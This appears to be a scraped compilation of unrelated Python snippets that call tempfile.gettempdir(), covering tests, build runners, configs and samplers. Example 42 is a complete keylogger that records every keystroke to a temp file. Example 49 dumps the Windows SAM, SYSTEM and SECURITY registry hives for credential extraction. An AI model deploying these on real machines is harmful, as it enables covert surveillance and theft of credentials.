    """Smoke test FTP destination. We first create a local file using Local FS destination stage and use that file
    for FTP destination stage to see if it gets successfully uploaded.
    The pipelines looks like:
        dev_raw_data_source >> local_fs
        directory >> sftp_ftp_client
    """
    # Our destination FTP file name
    ftp_file_name = get_random_string(string.ascii_letters, 10)
    # Local temporary directory where we will create a source file to be uploaded to FTP server
    local_tmp_directory = os.path.join(tempfile.gettempdir(), get_random_string(string.ascii_letters, 10))

    # Build source file pipeline logic
    builder = sdc_builder.get_pipeline_builder()

    dev_raw_data_source = builder.add_stage('Dev Raw Data Source')
    dev_raw_data_source.set_attributes(data_format='TEXT', raw_data='Hello World!', stop_after_first_batch=True)

    local_fs = builder.add_stage('Local FS', type='destination')
    local_fs.set_attributes(directory_template=local_tmp_directory, data_format='TEXT')

    dev_raw_data_source >> local_fs
    local_fs_pipeline = builder.build('Local FS Pipeline')

    builder = sdc_builder.get_pipeline_builder()

    # Build FTP destination pipeline logic
    directory = builder.add_stage('Directory', type='origin')
    directory.set_attributes(data_format='WHOLE_FILE', file_name_pattern='sdc*', files_directory=local_tmp_directory)

    sftp_ftp_client = builder.add_stage(name=FTP_DEST_CLIENT_NAME)
    sftp_ftp_client.file_name_expression = ftp_file_name

    directory >> sftp_ftp_client
    sftp_ftp_client_pipeline = builder.build('FTP Destination Pipeline Simple').configure_for_environment(ftp)

    sdc_executor.add_pipeline(local_fs_pipeline, sftp_ftp_client_pipeline)

    # Start source file creation pipeline and assert file has been created with expected number of records
    sdc_executor.start_pipeline(local_fs_pipeline).wait_for_finished()
    history = sdc_executor.get_pipeline_history(local_fs_pipeline)

    try:
        assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
        assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 1

        # Start FTP upload (destination) file pipeline and assert pipeline has processed expected number of files
        sdc_executor.start_pipeline(sftp_ftp_client_pipeline).wait_for_pipeline_output_records_count(1)
        sdc_executor.stop_pipeline(sftp_ftp_client_pipeline)
        history = sdc_executor.get_pipeline_history(sftp_ftp_client_pipeline)
        assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
        assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 1

        # Read FTP destination file and compare our source data to assert
        assert ftp.get_string(ftp_file_name) == dev_raw_data_source.raw_data

    finally:
        # Delete the test FTP destination file we created
        client = ftp.client
        client.delete(ftp_file_name)
        client.quit()
Ejemplo n.º 34
0
def main():
    # Parse arguments and pass through unrecognised args
    parser = argparse.ArgumentParser(add_help=False,
                                     usage='%(prog)s [test_runner.py options] [script options] [scripts]',
                                     description=__doc__,
                                     epilog='''
    Help text and arguments for individual test script:''',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('--combinedlogslen', '-c', type=int, default=0, help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
    parser.add_argument('--coverage', action='store_true', help='generate a basic coverage report for the RPC interface')
    parser.add_argument('--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
    parser.add_argument('--extended', action='store_true', help='run the extended test suite in addition to the basic tests')
    parser.add_argument('--force', '-f', action='store_true', help='run tests even on platforms where they are disabled by default (e.g. windows).')
    parser.add_argument('--help', '-h', '-?', action='store_true', help='print help text and exit')
    parser.add_argument('--jobs', '-j', type=int, default=4, help='how many test scripts to run in parallel. Default=4.')
    parser.add_argument('--keepcache', '-k', action='store_true', help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
    parser.add_argument('--quiet', '-q', action='store_true', help='only print results summary and failure logs')
    parser.add_argument('--tmpdirprefix', '-t', default=tempfile.gettempdir(), help="Root directory for datadirs")
    args, unknown_args = parser.parse_known_args()

    # args to be passed on always start with two dashes; tests are the remaining unknown args
    tests = [arg for arg in unknown_args if arg[:2] != "--"]
    passon_args = [arg for arg in unknown_args if arg[:2] == "--"]

    # Read config generated by configure.
    config = configparser.ConfigParser()
    configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
    config.read_file(open(configfile))

    passon_args.append("--configfile=%s" % configfile)

    # Set up logging
    logging_level = logging.INFO if args.quiet else logging.DEBUG
    logging.basicConfig(format='%(message)s', level=logging_level)

    # Create base test directory
    tmpdir = "%s/watercoin_test_runner_%s" % (args.tmpdirprefix, datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))
    os.makedirs(tmpdir)

    logging.debug("Temporary test directory at %s" % tmpdir)

    enable_wallet = config["components"].getboolean("ENABLE_WALLET")
    enable_utils = config["components"].getboolean("ENABLE_UTILS")
    enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")

    if config["environment"]["EXEEXT"] == ".exe" and not args.force:
        # https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
        # https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
        print("Tests currently disabled on Windows by default. Use --force option to enable")
        sys.exit(0)

    if not (enable_wallet and enable_utils and enable_bitcoind):
        print("No functional tests to run. Wallet, utils, and watercoind must all be enabled")
        print("Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
        sys.exit(0)

    # Build list of tests
    if tests:
        # Individual tests have been specified. Run specified tests that exist
        # in the ALL_SCRIPTS list. Accept the name with or without .py extension.
        tests = [re.sub("\.py$", "", t) + ".py" for t in tests]
        test_list = []
        for t in tests:
            if t in ALL_SCRIPTS:
                test_list.append(t)
            else:
                print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], t))
    else:
        # No individual tests have been specified.
        # Run all base tests, and optionally run extended tests.
        test_list = BASE_SCRIPTS
        if args.extended:
            # place the EXTENDED_SCRIPTS first since the three longest ones
            # are there and the list is shorter
            test_list = EXTENDED_SCRIPTS + test_list

    # Remove the test cases that the user has explicitly asked to exclude.
    if args.exclude:
        tests_excl = [re.sub("\.py$", "", t) + ".py" for t in args.exclude.split(',')]
        for exclude_test in tests_excl:
            if exclude_test in test_list:
                test_list.remove(exclude_test)
            else:
                print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test))

    if not test_list:
        print("No valid test scripts specified. Check that your test is in one "
              "of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
        sys.exit(0)

    if args.help:
        # Print help for test_runner.py, then print help of the first script (with args removed) and exit.
        parser.print_help()
        subprocess.check_call([(config["environment"]["SRCDIR"] + '/test/functional/' + test_list[0].split()[0])] + ['-h'])
        sys.exit(0)

    check_script_list(config["environment"]["SRCDIR"])
    check_script_prefixes()

    if not args.keepcache:
        shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True)

    run_tests(test_list, config["environment"]["SRCDIR"], config["environment"]["BUILDDIR"], config["environment"]["EXEEXT"], tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen)
Ejemplo n.º 35
0
def test_checkpoint_loader():
    import os
    import tempfile

    from mmcv.runner import CheckpointLoader, _load_checkpoint, save_checkpoint
    checkpoint_path = os.path.join(tempfile.gettempdir(), 'checkpoint.pth')
    model = Model()
    save_checkpoint(model, checkpoint_path)
    checkpoint = _load_checkpoint(checkpoint_path)
    assert 'meta' in checkpoint and 'CLASSES' not in checkpoint['meta']
    # remove the temp file
    os.remove(checkpoint_path)

    filenames = [
        'http://xx.xx/xx.pth', 'https://xx.xx/xx.pth',
        'modelzoo://xx.xx/xx.pth', 'torchvision://xx.xx/xx.pth',
        'open-mmlab://xx.xx/xx.pth', 'openmmlab://xx.xx/xx.pth',
        'mmcls://xx.xx/xx.pth', 'pavi://xx.xx/xx.pth', 's3://xx.xx/xx.pth',
        'ss3://xx.xx/xx.pth', ' s3://xx.xx/xx.pth',
        'open-mmlab:s3://xx.xx/xx.pth', 'openmmlab:s3://xx.xx/xx.pth',
        'openmmlabs3://xx.xx/xx.pth', ':s3://xx.xx/xx.path'
    ]
    fn_names = [
        'load_from_http', 'load_from_http', 'load_from_torchvision',
        'load_from_torchvision', 'load_from_openmmlab', 'load_from_openmmlab',
        'load_from_mmcls', 'load_from_pavi', 'load_from_ceph',
        'load_from_local', 'load_from_local', 'load_from_ceph',
        'load_from_ceph', 'load_from_local', 'load_from_local'
    ]

    for filename, fn_name in zip(filenames, fn_names):
        loader = CheckpointLoader._get_checkpoint_loader(filename)
        assert loader.__name__ == fn_name

    @CheckpointLoader.register_scheme(prefixes='ftp://')
    def load_from_ftp(filename, map_location):
        return dict(filename=filename)

    # test register_loader
    filename = 'ftp://xx.xx/xx.pth'
    loader = CheckpointLoader._get_checkpoint_loader(filename)
    assert loader.__name__ == 'load_from_ftp'

    def load_from_ftp1(filename, map_location):
        return dict(filename=filename)

    # test duplicate registered error
    with pytest.raises(KeyError):
        CheckpointLoader.register_scheme('ftp://', load_from_ftp1)

    # test force param
    CheckpointLoader.register_scheme('ftp://', load_from_ftp1, force=True)
    checkpoint = CheckpointLoader.load_checkpoint(filename)
    assert checkpoint['filename'] == filename

    # test print function name
    loader = CheckpointLoader._get_checkpoint_loader(filename)
    assert loader.__name__ == 'load_from_ftp1'

    # test sort
    @CheckpointLoader.register_scheme(prefixes='a/b')
    def load_from_ab(filename, map_location):
        return dict(filename=filename)

    @CheckpointLoader.register_scheme(prefixes='a/b/c')
    def load_from_abc(filename, map_location):
        return dict(filename=filename)

    filename = 'a/b/c/d'
    loader = CheckpointLoader._get_checkpoint_loader(filename)
    assert loader.__name__ == 'load_from_abc'
Ejemplo n.º 36
0
def test_load_checkpoint_metadata():
    import os
    import tempfile

    from mmcv.runner import load_checkpoint, save_checkpoint

    class ModelV1(nn.Module):
        def __init__(self):
            super().__init__()
            self.block = Block()
            self.conv1 = nn.Conv2d(3, 3, 1)
            self.conv2 = nn.Conv2d(3, 3, 1)
            nn.init.normal_(self.conv1.weight)
            nn.init.normal_(self.conv2.weight)

    class ModelV2(nn.Module):
        _version = 2

        def __init__(self):
            super().__init__()
            self.block = Block()
            self.conv0 = nn.Conv2d(3, 3, 1)
            self.conv1 = nn.Conv2d(3, 3, 1)
            nn.init.normal_(self.conv0.weight)
            nn.init.normal_(self.conv1.weight)

        def _load_from_state_dict(self, state_dict, prefix, local_metadata,
                                  *args, **kwargs):
            """load checkpoints."""

            # Names of some parameters in has been changed.
            version = local_metadata.get('version', None)
            if version is None or version < 2:
                state_dict_keys = list(state_dict.keys())
                convert_map = {'conv1': 'conv0', 'conv2': 'conv1'}
                for k in state_dict_keys:
                    for ori_str, new_str in convert_map.items():
                        if k.startswith(prefix + ori_str):
                            new_key = k.replace(ori_str, new_str)
                            state_dict[new_key] = state_dict[k]
                            del state_dict[k]

            super()._load_from_state_dict(state_dict, prefix, local_metadata,
                                          *args, **kwargs)

    model_v1 = ModelV1()
    model_v1_conv0_weight = model_v1.conv1.weight.detach()
    model_v1_conv1_weight = model_v1.conv2.weight.detach()
    model_v2 = ModelV2()
    model_v2_conv0_weight = model_v2.conv0.weight.detach()
    model_v2_conv1_weight = model_v2.conv1.weight.detach()
    ckpt_v1_path = os.path.join(tempfile.gettempdir(), 'checkpoint_v1.pth')
    ckpt_v2_path = os.path.join(tempfile.gettempdir(), 'checkpoint_v2.pth')

    # Save checkpoint
    save_checkpoint(model_v1, ckpt_v1_path)
    save_checkpoint(model_v2, ckpt_v2_path)

    # test load v1 model
    load_checkpoint(model_v2, ckpt_v1_path)
    assert torch.allclose(model_v2.conv0.weight, model_v1_conv0_weight)
    assert torch.allclose(model_v2.conv1.weight, model_v1_conv1_weight)

    # test load v2 model
    load_checkpoint(model_v2, ckpt_v2_path)
    assert torch.allclose(model_v2.conv0.weight, model_v2_conv0_weight)
    assert torch.allclose(model_v2.conv1.weight, model_v2_conv1_weight)
Ejemplo n.º 37
0
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#
# $Id$

from os import environ
from tempfile import gettempdir
environ['PYTHON_EGG_CACHE'] = gettempdir()

import sys
from jon import cgi
from exceptions import OGCException, ServerConfigurationError
from wms111 import ExceptionHandler as ExceptionHandler111
from wms130 import ExceptionHandler as ExceptionHandler130
from ConfigParser import SafeConfigParser
from common import Version


class Handler(cgi.DebugHandler):
    def __init__(self):
        conf = SafeConfigParser()
        conf.readfp(open(self.configpath))
        self.conf = conf
Ejemplo n.º 38
0
#

from tempfile import gettempdir

# Your Shadowsocks Path
#  SS_EXEC     - The full command starting ssserver, without "-d start".
#  SS_CONF     - The Shadowsocks config file which SSLand will manage.
SS_EXEC = ["sudo", "ssserver", "-c", "/etc/ss.conf"]
SS_CONF = "/etc/ss.conf"

# User Configuration
#  USER_ADMIN  - Administrator user ID. Ususally the first user, whose id is 1.
#  USER_SALT   - Account password hashing salt. Make it complex :)
USER_ADMIN = 1
USER_SALT = "~amADmANiNabLUEbOX!"

# The formular to generate User Shadowsocks Port
user_port = lambda id: 6580 + int(id * 1.5)

# Minimal interval for Shadowsocks restarting
UPDATE_INTERVAL = 30.0

# Directories
USER_ROOT = "user"
WEB_ROOT = "www"
TMP_ROOT = gettempdir() 

# WebServer Config
WEB_HOST = "0.0.0.0"
WEB_PORT = 8080
Ejemplo n.º 39
0
    from urllib.parse import urlparse


BASE_URL = os.getenv('NHENTAI', 'https://nhentai.net')

__api_suspended_DETAIL_URL = '%s/api/gallery' % BASE_URL

DETAIL_URL = '%s/g' % BASE_URL
SEARCH_URL = '%s/api/galleries/search' % BASE_URL


TAG_API_URL = '%s/api/galleries/tagged' % BASE_URL
LOGIN_URL = '%s/login/' % BASE_URL
CHALLENGE_URL = '%s/challenge' % BASE_URL
FAV_URL = '%s/favorites/' % BASE_URL

u = urlparse(BASE_URL)
IMAGE_URL = '%s://i.%s/galleries' % (u.scheme, u.hostname)

NHENTAI_HOME = os.path.join(os.getenv('HOME', tempfile.gettempdir()), '.nhentai')
NHENTAI_HISTORY = os.path.join(NHENTAI_HOME, 'history.sqlite3')
NHENTAI_CONFIG_FILE = os.path.join(NHENTAI_HOME, 'config.json')


CONFIG = {
    'proxy': {'http': '', 'https': ''},
    'cookie': '',
    'language': '',
    'template': '',
}
Ejemplo n.º 40
0
        " El partido entre dos equipos argentinos que los argentinos no pudieron organizar, y para el que solo encontraron la solución de que no se jugara en su territorio, aterrizó este jueves por la tarde en Madrid, cuando el presidente del Gobierno, Pedro Sánchez, anunció a través de su cuenta de Twitter, mientras volaba a Buenos Aires a la cumbre del G20: “España está dispuesta a organizar la final de la Copa Libertadores entre Boca y River”. Apenas una hora después, Alejandro Domínguez, presidente de la Conmebol, organizadora del torneo, oficializó que el encuentro se disputará el próximo domingo 9 de diciembre en el Santiago Bernabéu a las 20.30.",
        OutputFormat="mp3",
        VoiceId="Conchita")
except (BotoCoreError, ClientError) as error:
    # The service returned an error, exit gracefully
    print(error)
    sys.exit(-1)

# Access the audio stream from the response
if "AudioStream" in response:
    # Note: Closing the stream is important as the service throttles on the
    # number of parallel connections. Here we are using contextlib.closing to
    # ensure the close method of the stream object will be called automatically
    # at the end of the with statement's scope.
    with closing(response["AudioStream"]) as stream:
        output = os.path.join(gettempdir(), "speech.mp3")

        try:
            # Open a file for writing the output as a binary stream
            with open(output, "wb") as file:
                file.write(stream.read())
        except IOError as error:
            # Could not write to file, exit gracefully
            print(error)
            sys.exit(-1)

else:
    # The response didn't contain audio data, exit gracefully
    print("Could not stream audio")
    sys.exit(-1)
Ejemplo n.º 41
0
Archivo: fs.py Proyecto: HazardDede/pnp
 def _parse_out_path(value):
     if not value:
         import tempfile
         return tempfile.gettempdir()
     validator.is_directory(out_path=value)
     return os.path.abspath(str(value))
Ejemplo n.º 42
0
import tempfile
import logging
from pynput.keyboard import Key, Listener

print("Temp dir loc --> ", tempfile.gettempdir())

log_loc = tempfile.gettempdir()
log_file = "\key_logger.txt"
logging.basicConfig(filename=(log_loc + log_file),
                    level=logging.DEBUG,
                    format="%(asctime)s: %(message)s")


def key_presses(key):
    logging.info(str(key))


with Listener(on_press=key_presses) as listener:
    listener.join()
Ejemplo n.º 43
0
 def initialize(self):
     """Imports the PolyChord sampler and prepares its arguments."""
     if am_single_or_primary_process():  # rank = 0 (MPI master) or None (no MPI)
         self.log.info("Initializing")
     # If path not given, try using general path to modules
     if not self.path and self.path_install:
         self.path = get_path(self.path_install)
     if self.path:
         if am_single_or_primary_process():
             self.log.info("Importing *local* PolyChord from " + self.path)
             if not os.path.exists(os.path.realpath(self.path)):
                 self.log.error("The given path does not exist.")
                 raise HandledException
         pc_build_path = get_build_path(self.path)
         if not pc_build_path:
             self.log.error("Either PolyChord is not in the given folder, "
                            "'%s', or you have not compiled it.", self.path)
             raise HandledException
         # Inserting the previously found path into the list of import folders
         sys.path.insert(0, pc_build_path)
     else:
         self.log.info("Importing *global* PolyChord.")
     try:
         import pypolychord
         from pypolychord.settings import PolyChordSettings
         self.pc = pypolychord
     except ImportError:
         self.log.error(
             "Couldn't find the PolyChord python interface. "
             "Make sure that you have compiled it, and that you either\n"
             " (a) specify a path (you didn't) or\n"
             " (b) install the Python interface globally with\n"
             "     '/path/to/PolyChord/python setup.py install --user'")
         raise HandledException
     # Prepare arguments and settings
     self.nDims = self.model.prior.d()
     self.nDerived = (len(self.model.parameterization.derived_params()) +
                      len(self.model.prior) + len(self.model.likelihood._likelihoods))
     if self.logzero is None:
         self.logzero = np.nan_to_num(-np.inf)
     if self.max_ndead == np.inf:
         self.max_ndead = -1
     for p in ["nlive", "num_repeats", "nprior", "max_ndead"]:
         setattr(self, p, read_dnumber(getattr(self, p), self.nDims, dtype=int))
     # Fill the automatic ones
     if getattr(self, "feedback", None) is None:
         values = {logging.CRITICAL: 0, logging.ERROR: 0, logging.WARNING: 0,
                   logging.INFO: 1, logging.DEBUG: 2}
         self.feedback = values[self.log.getEffectiveLevel()]
     try:
         output_folder = getattr(self.output, "folder")
         output_prefix = getattr(self.output, "prefix") or ""
         self.read_resume = self.resuming
     except AttributeError:
         # dummy output -- no resume!
         self.read_resume = False
         from tempfile import gettempdir
         output_folder = gettempdir()
         if am_single_or_primary_process():
             from random import random
             output_prefix = hex(int(random() * 16 ** 6))[2:]
         else:
             output_prefix = None
         if more_than_one_process():
             output_prefix = get_mpi_comm().bcast(output_prefix, root=0)
     self.base_dir = os.path.join(output_folder, self.base_dir)
     self.file_root = output_prefix
     if am_single_or_primary_process():
         # Creating output folder, if it does not exist (just one process)
         if not os.path.exists(self.base_dir):
             os.makedirs(self.base_dir)
         # Idem, a clusters folder if needed -- notice that PolyChord's default
         # is "True", here "None", hence the funny condition below
         if self.do_clustering is not False:  # None here means "default"
             try:
                 os.makedirs(os.path.join(self.base_dir, clusters))
             except OSError:  # exists!
                 pass
         self.log.info("Storing raw PolyChord output in '%s'.",
                       self.base_dir)
     # Exploiting the speed hierarchy
     speeds, blocks = self.model.likelihood._speeds_of_params(int_speeds=True)
     blocks_flat = list(chain(*blocks))
     self.ordering = [
         blocks_flat.index(p) for p in self.model.parameterization.sampled_params()]
     self.grade_dims = [len(block) for block in blocks]
     #        self.grade_frac = np.array(
     #            [i*j for i,j in zip(self.grade_dims, speeds)])
     #        self.grade_frac = (
     #            self.grade_frac/sum(self.grade_frac))
     # Disabled for now. We need a way to override the "time" part of the meaning of grade_frac
     self.grade_frac = [1 / len(self.grade_dims) for _ in self.grade_dims]
     # Assign settings
     pc_args = ["nlive", "num_repeats", "nprior", "do_clustering",
                "precision_criterion", "max_ndead", "boost_posterior", "feedback",
                "logzero", "posteriors", "equals", "compression_factor",
                "cluster_posteriors", "write_resume", "read_resume", "write_stats",
                "write_live", "write_dead", "base_dir", "grade_frac", "grade_dims",
                "feedback", "read_resume", "base_dir", "file_root", "grade_frac",
                "grade_dims"]
     self.pc_settings = PolyChordSettings(
         self.nDims, self.nDerived, seed=(self.seed if self.seed is not None else -1),
         **{p: getattr(self, p) for p in pc_args if getattr(self, p) is not None})
     # prior conversion from the hypercube
     bounds = self.model.prior.bounds(
         confidence_for_unbounded=self.confidence_for_unbounded)
     # Check if priors are bounded (nan's to inf)
     inf = np.where(np.isinf(bounds))
     if len(inf[0]):
         params_names = self.model.parameterization.sampled_params()
         params = [params_names[i] for i in sorted(list(set(inf[0])))]
         self.log.error("PolyChord needs bounded priors, but the parameter(s) '"
                        "', '".join(params) + "' is(are) unbounded.")
         raise HandledException
     locs = bounds[:, 0]
     scales = bounds[:, 1] - bounds[:, 0]
     # This function re-scales the parameters AND puts them in the right order
     self.pc_prior = lambda x: (locs + np.array(x)[self.ordering] * scales).tolist()
     # We will need the volume of the prior domain, since PolyChord divides by it
     self.logvolume = np.log(np.prod(scales))
     # Prepare callback function
     if self.callback_function is not None:
         self.callback_function_callable = (
             get_external_function(self.callback_function))
     self.last_point_callback = 0
     # Prepare runtime live and dead points collections
     self.live = Collection(
         self.model, None, name="live", initial_size=self.pc_settings.nlive)
     self.dead = Collection(self.model, self.output, name="dead")
     self.n_sampled = len(self.model.parameterization.sampled_params())
     self.n_derived = len(self.model.parameterization.derived_params())
     self.n_priors = len(self.model.prior)
     self.n_likes = len(self.model.likelihood._likelihoods)
     # Done!
     if am_single_or_primary_process():
         self.log.info("Calling PolyChord with arguments:")
         for p, v in inspect.getmembers(self.pc_settings, lambda a: not (callable(a))):
             if not p.startswith("_"):
                 self.log.info("  %s: %s", p, v)
Ejemplo n.º 44
0
def Main():
    builder = os.environ.get('BUILDBOT_BUILDERNAME')
    build_number = os.environ.get('BUILDBOT_BUILDNUMBER')
    build_revision = os.environ.get('BUILDBOT_GOT_REVISION',
                                    os.environ.get('BUILDBOT_REVISION'))
    slave_type = os.environ.get('BUILDBOT_SLAVE_TYPE')
    cmd = BOT_ASSIGNMENT.get(builder)
    if not cmd:
        sys.stderr.write('ERROR - unset/invalid builder name\n')
        sys.exit(1)

    env = os.environ.copy()

    # Don't write out .pyc files because in cases in which files move around or
    # the PYTHONPATH / sys.path change, old .pyc files can be mistakenly used.
    # This avoids the need for admin changes on the bots in this case.
    env['PYTHONDONTWRITEBYTECODE'] = '1'

    env['GSUTIL'] = pynacl.file_tools.Which('gsutil.py',
                                            require_executable=False)

    # When running from cygwin, we sometimes want to use a native python.
    # The native python will use the depot_tools version by invoking python.bat.
    if pynacl.platform.IsWindows():
        env['NATIVE_PYTHON'] = 'python.bat'
    else:
        env['NATIVE_PYTHON'] = 'python'

    if sys.platform == 'win32':
        # If the temp directory is not on the same drive as the working directory,
        # there can be random failures when cleaning up temp directories, so use
        # a directory on the current drive. Use __file__ here instead of os.getcwd()
        # because toolchain_main picks its working directories relative to __file__
        filedrive, _ = os.path.splitdrive(__file__)
        tempdrive, _ = os.path.splitdrive(env['TEMP'])
        if tempdrive != filedrive:
            env['TEMP'] = filedrive + '\\temp'
            if not os.path.exists(env['TEMP']):
                os.mkdir(env['TEMP'])

    # Ensure a temp directory exists.
    if 'TEMP' not in env:
        env['TEMP'] = tempfile.gettempdir()

    # Isolate build's temp directory to a particular location so we can clobber
    # the whole thing predictably and so we have a record of who's leaking
    # temporary files.
    nacl_tmp = os.path.join(env['TEMP'], 'nacl_tmp')
    if not os.path.exists(nacl_tmp):
        os.mkdir(nacl_tmp)
    env['TEMP'] = os.path.join(nacl_tmp, builder)
    if not os.path.exists(env['TEMP']):
        os.mkdir(env['TEMP'])

    # Set all temp directory variants to the same thing.
    env['TMPDIR'] = env['TEMP']
    env['TMP'] = env['TEMP']
    print('TEMP=%s' % env['TEMP'])
    sys.stdout.flush()

    print("%s runs: %s\n" % (builder, cmd))
    sys.stdout.flush()
    retcode = subprocess.call(cmd, env=env, shell=True)
    sys.exit(retcode)
Ejemplo n.º 45
0
 def get_tmp_dir(self, opt_tmp_dir):
     if not opt_tmp_dir:
         return tempfile.gettempdir()
     return opt_tmp_dir
Ejemplo n.º 46
0
#!/usr/bin/env python
Ejemplo n.º 47
0
def run_iptestall(inc_slow=False):
    """Run the entire IPython test suite by calling nose and trial.

    This function constructs :class:`IPTester` instances for all IPython
    modules and package and then runs each of them.  This causes the modules
    and packages of IPython to be tested each in their own subprocess using
    nose.
    
    Parameters
    ----------
    
    inc_slow : bool, optional
      Include slow tests, like IPython.parallel. By default, these tests aren't
      run.
    """

    runners = make_runners(inc_slow=inc_slow)

    # Run the test runners in a temporary dir so we can nuke it when finished
    # to clean up any junk files left over by accident.  This also makes it
    # robust against being run in non-writeable directories by mistake, as the
    # temp dir will always be user-writeable.
    curdir = os.getcwdu()
    testdir = tempfile.gettempdir()
    os.chdir(testdir)

    # Run all test runners, tracking execution time
    failed = []
    t_start = time.time()
    try:
        for (name, runner) in runners:
            print('*'*70)
            print('IPython test group:',name)
            res = runner.run()
            if res:
                failed.append( (name, runner) )
                if res == -signal.SIGINT:
                    print("Interrupted")
                    break
    finally:
        os.chdir(curdir)
    t_end = time.time()
    t_tests = t_end - t_start
    nrunners = len(runners)
    nfail = len(failed)
    # summarize results
    print()
    print('*'*70)
    print('Test suite completed for system with the following information:')
    print(report())
    print('Ran %s test groups in %.3fs' % (nrunners, t_tests))
    print()
    print('Status:')
    if not failed:
        print('OK')
    else:
        # If anything went wrong, point out what command to rerun manually to
        # see the actual errors and individual summary
        print('ERROR - %s out of %s test groups failed.' % (nfail, nrunners))
        for name, failed_runner in failed:
            print('-'*40)
            print('Runner failed:',name)
            print('You may wish to rerun this one individually, with:')
            failed_call_args = [py3compat.cast_unicode(x) for x in failed_runner.call_args]
            print(u' '.join(failed_call_args))
            print()
        # Ensure that our exit code indicates failure
        sys.exit(1)
Ejemplo n.º 48
0
from pathlib import Path
from os.path import join
from tempfile import gettempdir

# pylint: disable=import-error
import tensorflow as tf

from tensorflow.contrib import predictor
# pylint: enable=import-error

from ..model import model_fn, InputProviderFactory
from ..model.provider import get_default_model_provider

# Default exporting directory for predictor.
DEFAULT_EXPORT_DIRECTORY = join(gettempdir(), 'serving')



def get_default_model_dir(model_dir):
    """
    Transforms a string like 'spleeter:2stems' into an actual path.
    :param model_dir:
    :return:
    """
    model_provider = get_default_model_provider()
    return model_provider.get(model_dir)

def create_estimator(params, MWF):
    """
        Initialize tensorflow estimator that will perform separation
Ejemplo n.º 49
0
	def from_live_system():
		logger.debug('Obtaining registry from local system')
		try:
			from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
			from pypykatz.commons.winapi.constants import SE_BACKUP
			import winreg
			import tempfile
			import os
			import ntpath
		except Exception as e:
			logger.error('Could not import necessary packages! Are you on Windows? Error: %s' % str(e))
			raise
			
		sam_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		system_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		security_name = ntpath.join(tempfile.gettempdir(), os.urandom(4).hex())
		
		locations = [
			('SAM', sam_name),
			('SYSTEM', system_name),
			('SECURITY', security_name),
		]
		
		logger.debug('Obtaining SE_BACKUP privilege...')
		try:
			po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
				logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
			else:
				logger.debug('Dumping %s OK!' % reg_name)
				dumped_names[reg_name] = location
		###
		### Do Parsing here!
		###
		po = None
		if 'SYSTEM' in dumped_names:
			try:
				po = OffineRegistry.from_files(system_name, sam_name if 'SAM' in dumped_names else None, security_name if 'SECURITY' in dumped_names else None)
			except Exception as e:
				import traceback
				traceback.print_exc()
		else:
			logger.error('Failed to dump SYSTEM hive, exiting...')
			
		logger.debug('Cleaning up temp files')
		for reg_name, location in locations:
			try:
				os.remove(location)
			except Exception as e:
				logger.error('Failed to clean up temp file for %s! Sensitive files might have been left on the filesystem! Path: %s Reason: %s' % (reg_name, location, str(e)))
			else:
				logger.debug('Cleanup for %s OK!' % reg_name)
	
		return po
Ejemplo n.º 50
0
 def __init__(self):
     rate_lock_path = tempfile.gettempdir(
     ) + "/m_rate.%s.lock" % HTTP_SOURCE_ADDR
     # Ensure the rate lock file exists (...the easy way)
     open(rate_lock_path, "a").close()
     self._rate_lock = open(rate_lock_path, "r+")
Ejemplo n.º 51
0
def log_lockfile():
    tempdir = tempfile.gettempdir()
    uid = os.getuid()
    path = os.path.join(tempdir, ".ansible-lock.%s" % uid)
    return path
Ejemplo n.º 52
0
def bootstrap(force=False, source=None):
    """
    Download and install the latest version of the Chocolatey package manager
    via the official bootstrap.

    Chocolatey requires Windows PowerShell and the .NET v4.0 runtime. Depending
    on the host's version of Windows, chocolatey.bootstrap will attempt to
    ensure these prerequisites are met by downloading and executing the
    appropriate installers from Microsoft.

    .. note::
        If PowerShell is installed, you may have to restart the host machine for
        Chocolatey to work.

    .. note::
        If you're installing offline using the source parameter, the PowerShell
        and .NET requirements must already be met on the target. This shouldn't
        be a problem on Windows versions 2012/8 and later

    Args:

        force (bool):
            Run the bootstrap process even if Chocolatey is found in the path.

        source (str):
            The location of the ``.nupkg`` file or ``.ps1`` file to run from an
            alternate location. This can be one of the following types of URLs:

            - salt://
            - http(s)://
            - ftp://
            - file:// - A local file on the system

            .. versionadded:: 3001

    Returns:
        str: The stdout of the Chocolatey installation script

    CLI Example:

    .. code-block:: bash

